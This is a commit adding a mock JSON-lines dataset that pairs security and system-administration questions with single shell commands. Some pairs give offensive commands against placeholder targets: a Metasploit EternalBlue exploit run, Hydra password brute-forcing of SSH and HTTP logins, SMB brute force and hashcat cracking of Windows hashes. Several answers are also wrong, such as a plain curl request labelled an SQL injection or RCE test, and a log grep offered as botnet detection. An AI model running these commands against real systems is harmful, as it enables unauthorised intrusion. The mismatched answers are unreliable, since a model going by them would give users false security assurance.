Create shell_commands_mock_data.json
Browse files
shell_commands_mock_data.json
ADDED
@@ -0,0 +1,78 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{"prompt": "How can I perform a port scan on a target IP?", "completion": "nmap -p- <target_ip>"}
|
2 |
+
{"prompt": "How do I use Metasploit to exploit a vulnerability?", "completion": "msfconsole -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target_ip>; run'"}
|
3 |
+
{"prompt": "How can I check for SUID files on a Linux system?", "completion": "find / -type f -perm -4000"}
|
4 |
+
{"prompt": "How do I enumerate users on a remote Windows machine?", "completion": "net user /domain"}
|
5 |
+
{"prompt": "How can I escalate privileges on a Linux system?", "completion": "sudo -l"}
|
6 |
+
{"prompt": "How do I find hidden files in a directory?", "completion": "ls -la"}
|
7 |
+
{"prompt": "How can I check for a running web server?", "completion": "ps aux | grep apache2"}
|
8 |
+
{"prompt": "How do I scan a specific port range using Nmap?", "completion": "nmap -p 1-1000 <target_ip>"}
|
9 |
+
{"prompt": "How can I check for SSH brute force attempts?", "completion": "grep 'Failed password' /var/log/auth.log"}
|
10 |
+
{"prompt": "How can I check open ports on a target IP?", "completion": "nmap -sT <target_ip>"}
|
11 |
+
{"prompt": "How can I perform a DNS lookup for a domain?", "completion": "dig <domain>"}
|
12 |
+
{"prompt": "How can I check if a Linux server is vulnerable to shellshock?", "completion": "env x='() { :;}; echo vulnerable' bash -c 'echo hello'"}
|
13 |
+
{"prompt": "How do I list all active network connections?", "completion": "netstat -tuln"}
|
14 |
+
{"prompt": "How can I check if my server is behind a firewall?", "completion": "nmap -sS <target_ip>"}
|
15 |
+
{"prompt": "How do I find out which services are running on a machine?", "completion": "ps aux"}
|
16 |
+
{"prompt": "How can I check for an open SMB share?", "completion": "smbclient -L //<target_ip>"}
|
17 |
+
{"prompt": "How do I find processes using high CPU on Linux?", "completion": "top -b -o %CPU | head -n 20"}
|
18 |
+
{"prompt": "How do I list all users on a Linux system?", "completion": "cat /etc/passwd"}
|
19 |
+
{"prompt": "How can I check for SSH key authentication?", "completion": "cat ~/.ssh/authorized_keys"}
|
20 |
+
{"prompt": "How do I find out what ports are open on a remote host?", "completion": "nmap -sV <target_ip>"}
|
21 |
+
{"prompt": "How can I perform a brute force attack using Hydra?", "completion": "hydra -l <user> -P <password_list> ssh://<target_ip>"}
|
22 |
+
{"prompt": "How can I detect hidden processes in Linux?", "completion": "ps aux --forest"}
|
23 |
+
{"prompt": "How do I search for world-writable files?", "completion": "find / -type f -perm -2"}
|
24 |
+
{"prompt": "How do I discover machines in the same network?", "completion": "nmap -sn <network_range>"}
|
25 |
+
{"prompt": "How can I check for scheduled tasks in Windows?", "completion": "schtasks /query"}
|
26 |
+
{"prompt": "How do I find the IP address of a remote server?", "completion": "nslookup <hostname>"}
|
27 |
+
{"prompt": "How do I gather system information on a Linux machine?", "completion": "uname -a"}
|
28 |
+
{"prompt": "How can I detect rootkits on a system?", "completion": "chkrootkit"}
|
29 |
+
{"prompt": "How do I find out what users are logged into a system?", "completion": "who" }
|
30 |
+
{"prompt": "How can I perform a SQL injection test?", "completion": "curl -X 'GET' '<target_url>' --data 'id=1' --header 'Host: <target_ip>'"}
|
31 |
+
{"prompt": "How can I dump a list of active users in Active Directory?", "completion": "net user /domain"}
|
32 |
+
{"prompt": "How do I perform a reverse DNS lookup?", "completion": "dig -x <ip_address>"}
|
33 |
+
{"prompt": "How do I brute force SMB login?", "completion": "nmap --script smb-brute <target_ip>"}
|
34 |
+
{"prompt": "How can I perform a vulnerability scan on a server?", "completion": "nikto -h <target_ip>"}
|
35 |
+
{"prompt": "How do I check the uptime of a Linux server?", "completion": "uptime"}
|
36 |
+
{"prompt": "How can I identify the version of a service?", "completion": "nmap -sV <target_ip>"}
|
37 |
+
{"prompt": "How do I extract metadata from an image file?", "completion": "exiftool <image_file>"}
|
38 |
+
{"prompt": "How can I check for weak passwords in a system?", "completion": "john --wordlist=<password_file> --rules <password_hash_file>"}
|
39 |
+
{"prompt": "How can I query for files modified recently?", "completion": "find / -type f -mtime -7"}
|
40 |
+
{"prompt": "How can I search for SSH login attempts?", "completion": "grep 'sshd' /var/log/auth.log"}
|
41 |
+
{"prompt": "How do I get information about a Windows machine?", "completion": "systeminfo"}
|
42 |
+
{"prompt": "How do I perform a ping sweep on a subnet?", "completion": "fping -a -g <subnet>"}
|
43 |
+
{"prompt": "How do I use netcat to listen on a port?", "completion": "nc -lvp <port>"}
|
44 |
+
{"prompt": "How can I collect information about a Windows service?", "completion": "sc qc <service_name>"}
|
45 |
+
{"prompt": "How can I discover web directories on a server?", "completion": "dirb <target_url>"}
|
46 |
+
{"prompt": "How do I check for failed login attempts?", "completion": "grep 'Failed password' /var/log/auth.log"}
|
47 |
+
{"prompt": "How can I identify the software running on a target server?", "completion": "nikto -h <target_ip>"}
|
48 |
+
{"prompt": "How can I list active user sessions on Linux?", "completion": "w"}
|
49 |
+
{"prompt": "How can I check for unpatched vulnerabilities on a system?", "completion": "openvas -h <target_ip>"}
|
50 |
+
{"prompt": "How can I perform a reconnaissance scan using Netcat?", "completion": "nc -v <target_ip> <port>"}
|
51 |
+
{"prompt": "How do I find a list of all mounted filesystems?", "completion": "mount | column -t"}
|
52 |
+
{"prompt": "How do I discover SMB shares on a Windows network?", "completion": "smbclient -L <target_ip> -U <user>"}
|
53 |
+
{"prompt": "How do I perform a brute force attack on HTTP basic auth?", "completion": "hydra -l <user> -P <password_list> <target_url> http-get" }
|
54 |
+
{"prompt": "How can I capture network traffic?", "completion": "tcpdump -i eth0 -w capture.pcap"}
|
55 |
+
{"prompt": "How do I check for suspicious cron jobs?", "completion": "crontab -l"}
|
56 |
+
{"prompt": "How can I discover network devices in my LAN?", "completion": "nmap -sn <network_range>"}
|
57 |
+
{"prompt": "How do I enumerate all the shares on a Windows system?", "completion": "net share"}
|
58 |
+
{"prompt": "How can I check the history of commands run on a Linux machine?", "completion": "cat ~/.bash_history"}
|
59 |
+
{"prompt": "How can I check for active RDP sessions?", "completion": "netstat -an | grep 3389"}
|
60 |
+
{"prompt": "How can I extract passwords from a Windows system?", "completion": "hashcat -m 1000 -a 0 <hash_file> <wordlist>"}
|
61 |
+
{"prompt": "How can I find unprotected FTP servers?", "completion": "nmap -p 21 --open <target_ip>"}
|
62 |
+
{"prompt": "How can I check for writable directories?", "completion": "find / -type d -perm -2"}
|
63 |
+
{"prompt": "How can I retrieve all the users from an LDAP directory?", "completion": "ldapsearch -x -b 'dc=example,dc=com' '(objectClass=person)'"}
|
64 |
+
{"prompt": "How can I check for clear-text passwords in configuration files?", "completion": "grep -r 'password' /etc"}
|
65 |
+
{"prompt": "How do I check for a possible MITM attack?", "completion": "netstat -an | grep <ip_address>"}
|
66 |
+
{"prompt": "How do I identify active network shares?", "completion": "smbclient -L <target_ip>"}
|
67 |
+
{"prompt": "How can I list all running Docker containers?", "completion": "docker ps"}
|
68 |
+
{"prompt": "How do I enumerate a domain for subdomains?", "completion": "dnsrecon -d <domain>"}
|
69 |
+
{"prompt": "How do I check for RCE vulnerabilities?", "completion": "curl -X 'GET' <target_url> --data 'id=1' --header 'Host: <target_ip>'"}
|
70 |
+
{"prompt": "How do I search for sensitive files in a web directory?", "completion": "dirb <target_url> -X .txt,.bak,.conf"}
|
71 |
+
{"prompt": "How can I search for exposed admin pages?", "completion": "dirbuster -u <target_url>/admin"}
|
72 |
+
{"prompt": "How can I check for broken symlinks?", "completion": "find / -type l -exec ls -l {} \; | grep 'No such file'"}
|
73 |
+
{"prompt": "How do I check for weak SSL/TLS configurations?", "completion": "openssl s_client -connect <target_ip>:443"}
|
74 |
+
{"prompt": "How do I find open MySQL databases?", "completion": "nmap -p 3306 --open <target_ip>"}
|
75 |
+
{"prompt": "How do I find out the DNS servers of a network?", "completion": "cat /etc/resolv.conf"}
|
76 |
+
{"prompt": "How do I check for unusual traffic patterns?", "completion": "tcpdump -i eth0 -nn"}
|
77 |
+
{"prompt": "How do I check for botnet activity?", "completion": "grep 'Connection refused' /var/log/syslog"}
|
78 |
+
{"prompt": "How do I check for vulnerability scanning tools on a network?", "completion": "nmap --script vuln <target_ip>"}
|